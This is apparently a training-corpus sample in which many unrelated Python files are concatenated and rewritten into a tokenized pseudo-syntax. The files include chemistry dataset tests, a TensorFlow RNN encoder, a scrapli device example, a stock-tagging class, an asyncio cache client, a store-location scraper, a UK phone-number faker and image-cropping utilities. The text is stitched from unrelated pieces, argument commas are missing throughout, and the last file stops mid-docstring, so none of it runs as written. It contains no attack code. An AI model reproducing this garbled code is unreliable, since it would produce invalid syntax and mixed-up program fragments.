conformer.duplicated_by=conformer.conformer_id+1<line_sep>self.assertEqual(dataset_pb2.Conformer.FATE_DUPLICATE_SAME_TOPOLOGY smu_utils_lib.determine_fate(conformer))<block_end><def_stmt>test_duplicate_different_topology self<block_start>conformer=get_stage1_conformer()<line_sep># bond topology is conformer_id // 1000
conformer.duplicated_by=conformer.conformer_id+1000<line_sep>self.assertEqual(dataset_pb2.Conformer.FATE_DUPLICATE_DIFFERENT_TOPOLOGY smu_utils_lib.determine_fate(conformer))<block_end>@parameterized.parameters((2 dataset_pb2.Conformer.FATE_GEOMETRY_OPTIMIZATION_PROBLEM) (5 dataset_pb2.Conformer.FATE_DISASSOCIATED) (4 dataset_pb2.Conformer.FATE_FORCE_CONSTANT_FAILURE) (6 dataset_pb2.Conformer.FATE_DISCARDED_OTHER))<def_stmt>test_geometry_failures self nstat1 expected_fate<block_start>conformer=get_stage1_conformer()<line_sep>conformer.properties.errors.error_nstat1=nstat1<line_sep>self.assertEqual(expected_fate smu_utils_lib.determine_fate(conformer))<block_end><def_stmt>test_no_result self<block_start>conformer=get_stage1_conformer()<line_sep>self.assertEqual(dataset_pb2.Conformer.FATE_NO_CALCULATION_RESULTS smu_utils_lib.determine_fate(conformer))<block_end>@parameterized.parameters((256 dataset_pb2.Conformer.FATE_CALCULATION_WITH_SERIOUS_ERROR) (50 dataset_pb2.Conformer.FATE_CALCULATION_WITH_MAJOR_ERROR) (4 dataset_pb2.Conformer.FATE_CALCULATION_WITH_MODERATE_ERROR))<def_stmt>test_calculation_errors self status expected<block_start>conformer=get_stage2_conformer()<line_sep>conformer.properties.errors.status=status<line_sep>self.assertEqual(expected smu_utils_lib.determine_fate(conformer))<block_end><def_stmt>test_calculation_warnings_serious self<block_start>conformer=get_stage2_conformer()<line_sep>conformer.properties.errors.warn_t1_excess=1234<line_sep>self.assertEqual(dataset_pb2.Conformer.FATE_CALCULATION_WITH_WARNING_SERIOUS smu_utils_lib.determine_fate(conformer))<block_end><def_stmt>test_calculation_warnings_vibrational self<block_start>conformer=get_stage2_conformer()<line_sep>conformer.properties.errors.warn_vib_linearity=1234<line_sep>self.assertEqual(dataset_pb2.Conformer.FATE_CALCULATION_WITH_WARNING_VIBRATIONAL smu_utils_lib.determine_fate(conformer))<block_end><def_stmt>test_success 
self<block_start>conformer=get_stage2_conformer()<line_sep>self.assertEqual(dataset_pb2.Conformer.FATE_SUCCESS smu_utils_lib.determine_fate(conformer))<block_end><block_end><class_stmt>ToBondTopologySummaryTest(absltest.TestCase)<block_start><def_stmt>setUp self<block_start>super().setUp()<line_sep>self.conformer=get_stage2_conformer()<block_end><def_stmt>test_dup_same self<block_start>self.conformer.fate=dataset_pb2.Conformer.FATE_DUPLICATE_SAME_TOPOLOGY<line_sep>got=list(smu_utils_lib.conformer_to_bond_topology_summaries(self.conformer))<line_sep>self.assertLen(got 1)<line_sep>self.assertEqual(got[0].bond_topology.bond_topology_id self.conformer.bond_topologies[0].bond_topology_id)<line_sep>self.assertEqual(got[0].count_attempted_conformers 1)<line_sep>self.assertEqual(got[0].count_duplicates_same_topology 1)<block_end><def_stmt>test_dup_diff self<block_start>self.conformer.fate=(dataset_pb2.Conformer.FATE_DUPLICATE_DIFFERENT_TOPOLOGY)<line_sep>got=list(smu_utils_lib.conformer_to_bond_topology_summaries(self.conformer))<line_sep>self.assertLen(got 1)<line_sep>self.assertEqual(got[0].count_attempted_conformers 1)<line_sep>self.assertEqual(got[0].count_duplicates_different_topology 1)<block_end><def_stmt>test_geometry_failed self<block_start>self.conformer.fate=(dataset_pb2.Conformer.FATE_DISCARDED_OTHER)<line_sep>got=list(smu_utils_lib.conformer_to_bond_topology_summaries(self.conformer))<line_sep>self.assertLen(got 1)<line_sep>self.assertEqual(got[0].count_attempted_conformers 1)<line_sep>self.assertEqual(got[0].count_failed_geometry_optimization 1)<block_end><def_stmt>test_missing_calculation self<block_start>self.conformer.fate=dataset_pb2.Conformer.FATE_NO_CALCULATION_RESULTS<line_sep>got=list(smu_utils_lib.conformer_to_bond_topology_summaries(self.conformer))<line_sep>self.assertLen(got 1)<line_sep>self.assertEqual(got[0].count_attempted_conformers 1)<line_sep>self.assertEqual(got[0].count_kept_geometry 
1)<line_sep>self.assertEqual(got[0].count_missing_calculation 1)<block_end><def_stmt>test_calculation_with_error self<block_start>self.conformer.fate=(dataset_pb2.Conformer.FATE_CALCULATION_WITH_SERIOUS_ERROR)<line_sep>self.conformer.bond_topologies.append(self.conformer.bond_topologies[0])<line_sep>self.conformer.bond_topologies[-1].bond_topology_id=123<line_sep>got=list(smu_utils_lib.conformer_to_bond_topology_summaries(self.conformer))<line_sep>self.assertLen(got 2)<line_sep># We don't actually care about the order, but this is what comes out right
# now.
self.assertEqual(got[0].bond_topology.bond_topology_id 123)<line_sep>self.assertEqual(got[0].count_attempted_conformers 0)<line_sep>self.assertEqual(got[0].count_kept_geometry 0)<line_sep>self.assertEqual(got[0].count_calculation_with_error 0)<line_sep>self.assertEqual(got[0].count_detected_match_with_error 1)<line_sep>self.assertEqual(got[1].bond_topology.bond_topology_id self.conformer.bond_topologies[0].bond_topology_id)<line_sep>self.assertEqual(got[1].count_attempted_conformers 1)<line_sep>self.assertEqual(got[1].count_kept_geometry 1)<line_sep>self.assertEqual(got[1].count_calculation_with_error 1)<line_sep>self.assertEqual(got[1].count_detected_match_with_error 0)<block_end><def_stmt>test_calculation_success self<block_start>self.conformer.fate=dataset_pb2.Conformer.FATE_SUCCESS<line_sep>self.conformer.bond_topologies.append(self.conformer.bond_topologies[0])<line_sep>self.conformer.bond_topologies[-1].bond_topology_id=123<line_sep>got=list(smu_utils_lib.conformer_to_bond_topology_summaries(self.conformer))<line_sep>self.assertLen(got 2)<line_sep># We don't actually care about the order, but this is what comes out right
# now.
self.assertEqual(got[0].bond_topology.bond_topology_id 123)<line_sep>self.assertEqual(got[0].count_attempted_conformers 0)<line_sep>self.assertEqual(got[0].count_kept_geometry 0)<line_sep>self.assertEqual(got[0].count_calculation_success 0)<line_sep>self.assertEqual(got[0].count_detected_match_success 1)<line_sep>self.assertEqual(got[1].bond_topology.bond_topology_id self.conformer.bond_topologies[0].bond_topology_id)<line_sep>self.assertEqual(got[1].count_attempted_conformers 1)<line_sep>self.assertEqual(got[1].count_kept_geometry 1)<line_sep>self.assertEqual(got[1].count_calculation_success 1)<line_sep>self.assertEqual(got[1].count_detected_match_success 0)<block_end><block_end><class_stmt>LabeledSmilesTester(absltest.TestCase)<block_start><def_stmt>test_atom_labels self<block_start>mol=Chem.MolFromSmiles('FCON[NH2+][O-]' sanitize=<false>)<line_sep>self.assertIsNotNone(mol)<line_sep>smiles_before=Chem.MolToSmiles(mol)<line_sep>self.assertEqual(smu_utils_lib.labeled_smiles(mol) 'F[CH2:1][O:2][NH:3][NH2+:4][O-:5]')<line_sep># Testing both the atom numbers and the smiles is redundant,
# but guards against possible future changes.
<for_stmt>atom mol.GetAtoms()<block_start>self.assertEqual(atom.GetAtomMapNum() 0)<block_end>self.assertEqual(Chem.MolToSmiles(mol) smiles_before)<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>absltest.main()<block_end> |
<import_stmt>tensorflow<as>tf<def_stmt>single_rnn_cell units:int cell_type:str="gru" name:str=<none><block_start><if_stmt>cell_type<eq>"gru"# Masking is not supported for CuDNN RNNs
<block_start><return>tf.keras.layers.GRU(units return_sequences=<true> return_state=<true> name=name)<block_end><elif_stmt>cell_type<eq>"cudnn_gru"<block_start><return>tf.compat.v1.keras.layers.CuDNNGRU(units return_sequences=<true> return_state=<true> name=name)<block_end><elif_stmt>cell_type<eq>"gru_cell"#return tf.keras.layers.GRUCell(
# units,
# name=name
#)
# Use this for decoder
<block_start><return>tf.nn.rnn_cell.GRUCell(units name=name)<block_end><else_stmt><block_start><raise>ValueError<block_end><block_end><class_stmt>RnnEncoder(tf.keras.layers.Layer)<block_start><def_stmt>__init__ self units:int cell_type:str="gru" name:str=<none><block_start>super().__init__(name=name)<line_sep>self._units=units<line_sep>self._cell_type=cell_type<line_sep>self._name=name<block_end><def_stmt>build self input_shape<block_start>rnn_cell=single_rnn_cell(self._units self._cell_type)<line_sep>self.birnn_cell=tf.keras.layers.Bidirectional(rnn_cell)<line_sep>super().build(input_shape)<block_end><def_stmt>call self x initial_state=<none><block_start>outputs,fw_state,bw_state=self.birnn_cell(x initial_state=initial_state)<line_sep><return>outputs fw_state bw_state<block_end><def_stmt>compute_output_shape self input_shape<block_start>shape=tf.TensorShape(input_shape).as_list()<line_sep>batch_size=shape[0]<line_sep>shape[-1]=self._units<times>2<line_sep><return>[tf.TensorShape(shape) tf.TensorShape([batch_size self._units]) tf.TensorShape([batch_size self._units])]<block_end><def_stmt>get_config self<block_start><return>{"units":self._units "cell_type":self._cell_type}<block_end><def_stmt>compute_mask self inputs mask<block_start><return>self.birnn_cell.compute_mask(inputs mask)<block_end><block_end> |
"""PatchmatchNet dataset module
reference: https://github.com/FangjinhuaWang/PatchmatchNet
"""<line_sep> |
"""examples.basic_usage.generic_driver"""<import_from_stmt>scrapli.driver GenericDriver<line_sep>MY_DEVICE={"host":"172.18.0.11" "auth_username":"scrapli" "auth_password":"<PASSWORD>" "auth_strict_key":<false> }<def_stmt>main <block_start>"""Simple example of connecting to an IOSXEDevice with the GenericDriver"""<line_sep># the `GenericDriver` is a good place to start if your platform is not supported by a "core"
# platform drivers
conn=GenericDriver(**MY_DEVICE)<line_sep>conn.open()<line_sep>print(conn.channel.get_prompt())<line_sep>print(conn.send_command("show run | i hostname").result)<line_sep># IMPORTANT: paging is NOT disabled w/ GenericDriver driver!
conn.send_command("terminal length 0")<line_sep>print(conn.send_command("show run").result)<line_sep>conn.close()<line_sep># Context manager is a great way to use scrapli, it will auto open/close the connection for you:
<with_stmt>GenericDriver(**MY_DEVICE)<as>conn<block_start>result=conn.send_command("show run | i hostname")<block_end>print(result.result)<block_end><if_stmt>__name__<eq>"__main__"<block_start>main()<block_end> |
# -*- coding: utf-8 -*-
<import_stmt>logging<import_from_stmt>typing Type<import_stmt>pandas<as>pd<import_from_stmt>zvt.contract Mixin<import_from_stmt>zvt.contract TradableEntity<import_from_stmt>zvt.contract.api get_db_session<import_from_stmt>zvt.contract.base OneStateService<import_from_stmt>zvt.contract.zvt_info TaggerState<import_from_stmt>zvt.domain Stock Index<import_from_stmt>zvt.tag.dataset.stock_tags StockTags<import_from_stmt>zvt.utils to_time_str to_pd_timestamp<import_from_stmt>zvt.utils.time_utils TIME_FORMAT_DAY now_pd_timestamp<line_sep>logger=logging.getLogger(__name__)<class_stmt>Tagger(OneStateService)<block_start>state_schema=TaggerState<line_sep>entity_schema:Type[TradableEntity]=<none><line_sep>data_schema:Type[Mixin]=<none><line_sep>start_timestamp="2005-01-01"<def_stmt>__init__ self force=<false><arrow><none><block_start>super().__init__()<assert_stmt>self.entity_schema<is><not><none><assert_stmt>self.data_schema<is><not><none><line_sep>self.force=force<line_sep>self.session=get_db_session(provider="zvt" data_schema=self.data_schema)<if_stmt>self.state<and><not>self.force<block_start>logger.info(f"get start_timestamp from state")<line_sep>self.start_timestamp=self.state["current_timestamp"]<block_end>logger.info(f"tag start_timestamp: {self.start_timestamp}")<block_end><def_stmt>tag self timestamp<block_start><raise>NotImplementedError<block_end><def_stmt>get_tag_timestamps self<block_start><return>pd.date_range(start=self.start_timestamp end=now_pd_timestamp() freq="M")<block_end><def_stmt>get_tag_domain self entity_id timestamp **fill_kv<block_start>the_date=to_time_str(timestamp fmt=TIME_FORMAT_DAY)<line_sep>the_id=f"{entity_id}_{the_date}"<line_sep>the_domain=self.data_schema.get_one(id=the_id)<if_stmt>the_domain<block_start><for_stmt>k,v fill_kv.items()<block_start>exec(f"the_domain.{k}=v")<block_end><block_end><else_stmt><block_start><return>self.data_schema(id=the_id entity_id=entity_id timestamp=to_pd_timestamp(the_date) 
**fill_kv)<block_end><return>the_domain<block_end><def_stmt>get_tag_domains self entity_ids timestamp **fill_kv<block_start>the_date=to_time_str(timestamp fmt=TIME_FORMAT_DAY)<line_sep>ids=[f"{entity_id}_{the_date}"<for>entity_id entity_ids]<line_sep>the_domains=self.data_schema.query_data(ids=ids return_type="domain")<if_stmt>the_domains<block_start><for_stmt>the_domain the_domains<block_start><for_stmt>k,v fill_kv.items()<block_start>exec(f"the_domain.{k}=v")<block_end><block_end><block_end>current_ids=[item.id<for>item the_domains]<line_sep>need_new_ids=set(ids)-set(current_ids)<line_sep>new_domains=[self.data_schema(id=f"{entity_id}_{the_date}" entity_id=entity_id timestamp=to_pd_timestamp(the_date) **fill_kv)<for>entity_id need_new_ids]<line_sep><return>the_domains+new_domains<block_end><def_stmt>run self<block_start>timestamps=self.get_tag_timestamps()<for_stmt>timestamp timestamps<block_start>logger.info(f"tag to {timestamp}")<line_sep>self.tag(timestamp=timestamp)<line_sep>self.state={"current_timestamp":to_time_str(timestamp)}<line_sep>self.persist_state()<block_end><block_end><block_end><class_stmt>StockTagger(Tagger)<block_start>data_schema=StockTags<line_sep>entity_schema=Stock<def_stmt>tag self timestamp<block_start><raise>NotImplementedError<block_end><block_end><class_stmt>IndexTagger(Tagger)<block_start>data_schema=StockTags<line_sep>entity_schema=Index<def_stmt>tag self timestamp<block_start><raise>NotImplementedError<block_end><block_end># the __all__ is generated
__all__=["Tagger" "StockTagger" "IndexTagger"]<line_sep> |
"""Client for cache server.
See cachesvr.py for protocol description.
"""<import_stmt>argparse<import_stmt>asyncio<import_from_stmt>asyncio test_utils<import_stmt>json<import_stmt>logging<line_sep>ARGS=argparse.ArgumentParser(description='Cache client example.')<line_sep>ARGS.add_argument('--tls' action='store_true' dest='tls' default=<false> help='Use TLS')<line_sep>ARGS.add_argument('--iocp' action='store_true' dest='iocp' default=<false> help='Use IOCP event loop (Windows only)')<line_sep>ARGS.add_argument('--host' action='store' dest='host' default='localhost' help='Host name')<line_sep>ARGS.add_argument('--port' action='store' dest='port' default=54321 type=int help='Port number')<line_sep>ARGS.add_argument('--timeout' action='store' dest='timeout' default=5 type=float help='Timeout')<line_sep>ARGS.add_argument('--max_backoff' action='store' dest='max_backoff' default=5 type=float help='Max backoff on reconnect')<line_sep>ARGS.add_argument('--ntasks' action='store' dest='ntasks' default=10 type=int help='Number of tester tasks')<line_sep>ARGS.add_argument('--ntries' action='store' dest='ntries' default=5 type=int help='Number of request tries before giving up')<line_sep>args=ARGS.parse_args()<class_stmt>CacheClient<block_start>"""Multiplexing cache client.
This wraps a single connection to the cache client. The
connection is automatically re-opened when an error occurs.
Multiple tasks may share this object; the requests will be
serialized.
The public API is get(), set(), delete() (all are coroutines).
"""<def_stmt>__init__ self host port sslctx=<none> loop=<none><block_start>self.host=host<line_sep>self.port=port<line_sep>self.sslctx=sslctx<line_sep>self.loop=loop<line_sep>self.todo=set()<line_sep>self.initialized=<false><line_sep>self.task=asyncio.Task(self.activity() loop=self.loop)<block_end>@asyncio.coroutine<def_stmt>get self key<block_start>resp=<yield><from>self.request('get' key)<if_stmt>resp<is><none><block_start><return><none><block_end><return>resp.get('value')<block_end>@asyncio.coroutine<def_stmt>set self key value<block_start>resp=<yield><from>self.request('set' key value)<if_stmt>resp<is><none><block_start><return><false><block_end><return>resp.get('status')<eq>'ok'<block_end>@asyncio.coroutine<def_stmt>delete self key<block_start>resp=<yield><from>self.request('delete' key)<if_stmt>resp<is><none><block_start><return><false><block_end><return>resp.get('status')<eq>'ok'<block_end>@asyncio.coroutine<def_stmt>request self type key value=<none><block_start><assert_stmt><not>self.task.done()<line_sep>data={'type':type 'key':key}<if_stmt>value<is><not><none><block_start>data['value']=value<block_end>payload=json.dumps(data).encode('utf8')<line_sep>waiter=asyncio.Future(loop=self.loop)<if_stmt>self.initialized<block_start><try_stmt><block_start><yield><from>self.send(payload waiter)<block_end><except_stmt>IOError<block_start>self.todo.add((payload waiter))<block_end><block_end><else_stmt><block_start>self.todo.add((payload waiter))<block_end><return>(<yield><from>waiter)<block_end>@asyncio.coroutine<def_stmt>activity self<block_start>backoff=0<while_stmt><true><block_start><try_stmt><block_start>self.reader,self.writer=<yield><from>asyncio.open_connection(self.host self.port ssl=self.sslctx loop=self.loop)<block_end><except_stmt>Exception<as>exc<block_start>backoff=min(args.max_backoff backoff+(backoff<floordiv>2)+1)<line_sep>logging.info('Error connecting: %r; sleep %s' exc backoff)<line_sep><yield><from>asyncio.sleep(backoff 
loop=self.loop)<line_sep><continue><block_end>backoff=0<line_sep>self.next_id=0<line_sep>self.pending={}<line_sep>self.initialized=<true><try_stmt><block_start><while_stmt>self.todo<block_start>payload,waiter=self.todo.pop()<if_stmt><not>waiter.done()<block_start><yield><from>self.send(payload waiter)<block_end><block_end><while_stmt><true><block_start>resp_id,resp=<yield><from>self.process()<if_stmt>resp_id<in>self.pending<block_start>payload,waiter=self.pending.pop(resp_id)<if_stmt><not>waiter.done()<block_start>waiter.set_result(resp)<block_end><block_end><block_end><block_end><except_stmt>Exception<as>exc<block_start>self.initialized=<false><line_sep>self.writer.close()<while_stmt>self.pending<block_start>req_id,pair=self.pending.popitem()<line_sep>payload,waiter=pair<if_stmt><not>waiter.done()<block_start>self.todo.add(pair)<block_end><block_end>logging.info('Error processing: %r' exc)<block_end><block_end><block_end>@asyncio.coroutine<def_stmt>send self payload waiter<block_start>self.next_id<augadd>1<line_sep>req_id=self.next_id<line_sep>frame='request %d %d\n'%(req_id len(payload))<line_sep>self.writer.write(frame.encode('ascii'))<line_sep>self.writer.write(payload)<line_sep>self.pending[req_id]=payload waiter<line_sep><yield><from>self.writer.drain()<block_end>@asyncio.coroutine<def_stmt>process self<block_start>frame=<yield><from>self.reader.readline()<if_stmt><not>frame<block_start><raise>EOFError()<block_end>head,tail=frame.split(<none> 1)<if_stmt>head<eq>b'error'<block_start><raise>IOError('OOB error: %r'%tail)<block_end><if_stmt>head<ne>b'response'<block_start><raise>IOError('Bad frame: %r'%frame)<block_end>resp_id,resp_size=map(int tail.split())<line_sep>data=<yield><from>self.reader.readexactly(resp_size)<if_stmt>len(data)<ne>resp_size<block_start><raise>EOFError()<block_end>resp=json.loads(data.decode('utf8'))<line_sep><return>resp_id resp<block_end><block_end><def_stmt>main 
<block_start>asyncio.set_event_loop(<none>)<if_stmt>args.iocp<block_start><import_from_stmt>asyncio.windows_events ProactorEventLoop<line_sep>loop=ProactorEventLoop()<block_end><else_stmt><block_start>loop=asyncio.new_event_loop()<block_end>sslctx=<none><if_stmt>args.tls<block_start>sslctx=test_utils.dummy_ssl_context()<block_end>cache=CacheClient(args.host args.port sslctx=sslctx loop=loop)<try_stmt><block_start>loop.run_until_complete(asyncio.gather(*[testing(i cache loop)<for>i range(args.ntasks)] loop=loop))<block_end><finally_stmt><block_start>loop.close()<block_end><block_end>@asyncio.coroutine<def_stmt>testing label cache loop<block_start><def_stmt>w g<block_start><return>asyncio.wait_for(g args.timeout loop=loop)<block_end>key='foo-%s'%label<while_stmt><true><block_start>logging.info('%s %s' label '-'<times>20)<try_stmt><block_start>ret=<yield><from>w(cache.set(key 'hello-%s-world'%label))<line_sep>logging.info('%s set %s' label ret)<line_sep>ret=<yield><from>w(cache.get(key))<line_sep>logging.info('%s get %s' label ret)<line_sep>ret=<yield><from>w(cache.delete(key))<line_sep>logging.info('%s del %s' label ret)<line_sep>ret=<yield><from>w(cache.get(key))<line_sep>logging.info('%s get2 %s' label ret)<block_end><except_stmt>asyncio.TimeoutError<block_start>logging.warn('%s Timeout' label)<block_end><except_stmt>Exception<as>exc<block_start>logging.exception('%s Client exception: %r' label exc)<line_sep><break><block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>logging.basicConfig(level=logging.INFO)<line_sep>main()<block_end> |
# -*- coding: utf-8 -*-
<import_stmt>json<import_stmt>re<import_stmt>scrapy<import_from_stmt>locations.items GeojsonPointItem<import_from_stmt>locations.hours OpeningHours<class_stmt>HopdoddyBurgerBarSpider(scrapy.Spider)<block_start>name="hopdoddy_burger_bar"<line_sep>allowed_domains=["amazonaws.com"]<def_stmt>start_requests self<block_start>base_url="https://na6c0i4fb0.execute-api.us-west-2.amazonaws.com/restaurants/near?lat={lat}3&long={lon}"<with_stmt>open('./locations/searchable_points/us_centroids_25mile_radius.csv')<as>points<block_start>next(points)# Ignore the header
<for_stmt>point points<block_start>_,lat,lon=point.strip().split(',')<line_sep>url=base_url.format(lat=lat lon=lon)<line_sep><yield>scrapy.http.Request(url callback=self.parse)<block_end><block_end><block_end><def_stmt>parse self response<block_start>data=json.loads(response.body_as_unicode())<for_stmt>place data["restaurants"]<block_start>properties={'ref':place["id"] 'name':place["name"] 'addr_full':place["streetaddress"] 'city':place["city"] 'state':place["state"] 'postcode':place["zip"] 'country':place["country"] 'lat':place["latitude"] 'lon':place["longitude"] 'phone':place["telephone"]}<line_sep><yield>GeojsonPointItem(**properties)<block_end><block_end><block_end> |
<import_from_stmt>.. Provider<as>PhoneNumberProvider<class_stmt>Provider(PhoneNumberProvider)# Source:
# https://en.wikipedia.org/wiki/Telephone_numbers_in_the_United_Kingdom
# Fake phone numbers should be fake - this provider has been rewritten to
# use numbers reserved for dramatic use by Ofcom. See the following:
# https://en.wikipedia.org/wiki/Fictitious_telephone_number#United_Kingdom
# This ensures no genuine numbers are generated at random.
#
# It's worth noting that the following examples include incorrect notation
# of British phone numbers. +44(0)xxx is incorrect and the '(0)' should
# be omitted. However, it's commonly written this way by Joe Public
# and would better serve this project to be included, as it represents
# more realistic data and is of benefit to those developing data cleansing
# tools etc. All possible official fake numbers are covered below.
<block_start>cellphone_formats=('07700 900 ###' '07700 900###' '07700900###' '(07700) 900 ###' '(07700) 900###' '(07700)900###' '+447700 900 ###' '+447700 900###' '+447700900###' '+44(0)7700 900 ###' '+44(0)7700 900###' '+44(0)7700900###' )<line_sep>formats=('0113 496 0###' '0113 4960###' '01134960###' '(0113) 496 0###' '(0113) 4960###' '(0113)4960###' '+44113 496 0###' '+44113 4960###' '+441134960###' '+44(0)113 496 0###' '+44(0)113 4960###' '+44(0)1134960###' '0114 496 0###' '0114 4960###' '01144960###' '(0114) 496 0###' '(0114) 4960###' '(0114)4960###' '+44114 496 0###' '+44114 4960###' '+441144960###' '+44(0)114 496 0###' '+44(0)114 4960###' '+44(0)1144960###' '0115 496 0###' '0115 4960###' '01154960###' '(0115) 496 0###' '(0115) 4960###' '(0115)4960###' '+44115 496 0###' '+44115 4960###' '+441154960###' '+44(0)115 496 0###' '+44(0)115 4960###' '+44(0)1154960###' '0116 496 0###' '0116 4960###' '01164960###' '(0116) 496 0###' '(0116) 4960###' '(0116)4960###' '+44116 496 0###' '+44116 4960###' '+441164960###' '+44(0)116 496 0###' '+44(0)116 4960###' '+44(0)1164960###' '0117 496 0###' '0117 4960###' '01174960###' '(0117) 496 0###' '(0117) 4960###' '(0117)4960###' '+44117 496 0###' '+44117 4960###' '+441174960###' '+44(0)117 496 0###' '+44(0)117 4960###' '+44(0)1174960###' '0118 496 0###' '0118 4960###' '01184960###' '(0118) 496 0###' '(0118) 4960###' '(0118)4960###' '+44118 496 0###' '+44118 4960###' '+441184960###' '+44(0)118 496 0###' '+44(0)118 4960###' '+44(0)1184960###' '0121 496 0###' '0121 4960###' '01214960###' '(0121) 496 0###' '(0121) 4960###' '(0121)4960###' '+44121 496 0###' '+44121 4960###' '+441214960###' '+44(0)121 496 0###' '+44(0)121 4960###' '+44(0)1214960###' '0131 496 0###' '0131 4960###' '01314960###' '(0131) 496 0###' '(0131) 4960###' '(0131)4960###' '+44131 496 0###' '+44131 4960###' '+441314960###' '+44(0)131 496 0###' '+44(0)131 4960###' '+44(0)1314960###' '0141 496 0###' '0141 4960###' '01414960###' '(0141) 496 0###' '(0141) 4960###' 
'(0141)4960###' '+44141 496 0###' '+44141 4960###' '+441414960###' '+44(0)141 496 0###' '+44(0)141 4960###' '+44(0)1414960###' '0151 496 0###' '0151 4960###' '01514960###' '(0151) 496 0###' '(0151) 4960###' '(0151)4960###' '+44151 496 0###' '+44151 4960###' '+441514960###' '+44(0)151 496 0###' '+44(0)151 4960###' '+44(0)1514960###' '0161 496 0###' '0161 4960###' '01614960###' '(0161) 496 0###' '(0161) 4960###' '(0161)4960###' '+44161 496 0###' '+44161 4960###' '+441614960###' '+44(0)161 496 0###' '+44(0)161 4960###' '+44(0)1614960###' '0191 498 0###' '0191 4960###' '01914960###' '(0191) 496 0###' '(0191) 4960###' '(0191)4960###' '+44191 496 0###' '+44191 4960###' '+441914960###' '+44(0)191 496 0###' '+44(0)191 4960###' '+44(0)1914960###' '020 7946 0###' '020 74960###' '02074960###' '(020) 7496 0###' '(020) 74960###' '(020)74960###' '+4420 7496 0###' '+4420 74960###' '+442074960###' '+44(0)20 7496 0###' '+44(0)20 74960###' '+44(0)2074960###' '028 9018 0###' '028 9018###' '0289018###' '(028) 9018 0###' '(028) 9018###' '(028)9018###' '+4428 9018 0###' '+4428 9018###' '+44289018###' '+44(0)28 9018 0###' '+44(0)28 9018###' '+44(0)289018###' '029 2018 0###' '029 2018###' '0292018###' '(029) 2018 0###' '(029) 2018###' '(029)2018###' '+4429 2018 0###' '+4429 2018###' '+44292018###' '+44(0)29 2018 0###' '+44(0)29 2018###' '+44(0)292018###' '01632 960 ###' '01632 960###' '01632960###' '(01632) 960 ###' '(01632) 960###' '(01632)960###' '+441632 960 ###' '+441632 960###' '+441632960###' '+44(0)1632 960 ###' '+44(0)1632 960###' '+44(0)1632960###' '0306 999 0###' '0306 9990###' '03069990###' '(0306) 999 0###' '(0306) 9990###' '(0306)9990###' '+44306 999 0###' '+44306 9990###' '+443069990###' '+44(0)306 999 0###' '+44(0)306 9990###' '+44(0)3069990###' '0808 157 0###' '0808 1570###' '08081570###' '(0808) 157 0###' '(0808) 1570###' '(0808)1570###' '+44808 157 0###' '+44808 1570###' '+448081570###' '+44(0)808 157 0###' '+44(0)808 1570###' '+44(0)8081570###' '0909 879 0###' '0909 
8790###' '09098790###' '(0909) 879 0###' '(0909) 8790###' '(0909)8790###' '+44909 879 0###' '+44909 8790###' '+449098790###' '+44(0)909 879 0###' '+44(0)909 8790###' '+44(0)9098790###' )<def_stmt>cellphone_number self<arrow>str<block_start>pattern:str=self.random_element(self.cellphone_formats)<line_sep><return>self.numerify(self.generator.parse(pattern))<block_end><block_end> |
# coding=utf-8
""" The mfbot Python3 CLI script """<import_from_stmt>mfbot MFBot<def_stmt>main <arrow><none><block_start>""" Main function to start things up for the command line use of mfbot """<line_sep>mfbot=MFBot()<line_sep>mfbot.parse_args()<if_stmt>mfbot.dir<block_start>yara_rule_output=mfbot.dir_run()<if_stmt>len(yara_rule_output)<g>0<block_start>mfbot.print_yara_rule(yara_rule_output)<block_end><else_stmt><block_start>print("No images found within that directory")<block_end><block_end><else_stmt><block_start>yara_rule_output=mfbot.run()<if_stmt>len(yara_rule_output)<g>0<block_start>mfbot.print_yara_rule(yara_rule_output)<block_end><else_stmt><block_start>print('No image found.')<block_end><block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>main()<block_end> |
# Copyright 2018 University of Basel, Center for medical Image Analysis and Navigation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
<import_stmt>os<import_stmt>multiprocessing<as>mp<line_sep>os.environ["ITK_GLOBAL_DEFAULT_NUMBER_OF_THREADS"]=str(mp.cpu_count())<import_stmt>SimpleITK<as>sitk<import_stmt>numpy<as>np<import_stmt>torch<as>th<import_from_stmt>.image Image<def_stmt>auto_crop_image_filter image boundary_value=0<block_start>"""
Performs an auto cropping of values on boundary
image (Image): image which has to be cropped
boundary_value (float|int): specifies the boundary value which will be cropped
return (Image): a new image with cropped boundary
"""<line_sep>msk=1-(image.image.squeeze()<eq>boundary_value)<line_sep>rminmax=[]<for_stmt>d range(len(msk.shape))<block_start>region=msk.argmax(dim=d).nonzero()<line_sep>rminmax.append((region.min(dim=0)[0] region.max(dim=0)[0]))<line_sep>#print(rminmax[-1])
<block_end><if_stmt>image.ndim<eq>2<block_start>cropped=image.image.squeeze()[rminmax[1][0]:rminmax[1][1] rminmax[0][0]:rminmax[0][1]]<line_sep>origin=image.origin+th.Tensor(image.spacing)<times>th.Tensor([rminmax[1][0] rminmax[0][0]])<block_end><elif_stmt>image.ndim<eq>3<block_start>cropped=image.image.squeeze()[rminmax[1][0][0]:rminmax[1][1][0] rminmax[0][0][0]:rminmax[0][1][0] rminmax[0][0][1]:rminmax[0][1][1]]<line_sep>#print(cropped.shape)
origin=th.Tensor(image.origin)+th.Tensor(image.spacing)<times>th.Tensor([rminmax[1][0][0] rminmax[0][0][0] rminmax[0][0][1]])<block_end><else_stmt><block_start><raise>Exception("Only 2 and 3 space dimensions supported")<block_end>size=tuple(cropped.shape)<line_sep>cropped.unsqueeze_(0).unsqueeze_(0)<line_sep><return>Image(cropped size image.spacing origin.tolist())<block_end><def_stmt>normalize_images fixed_image moving_image<block_start>"""
Noramlize image intensities by extracting joint minimum and dividing by joint maximum
Note: the function is inplace
fixed_image (Image): fixed image
moving_image (Image): moving image
return (Image, Image): normalized images
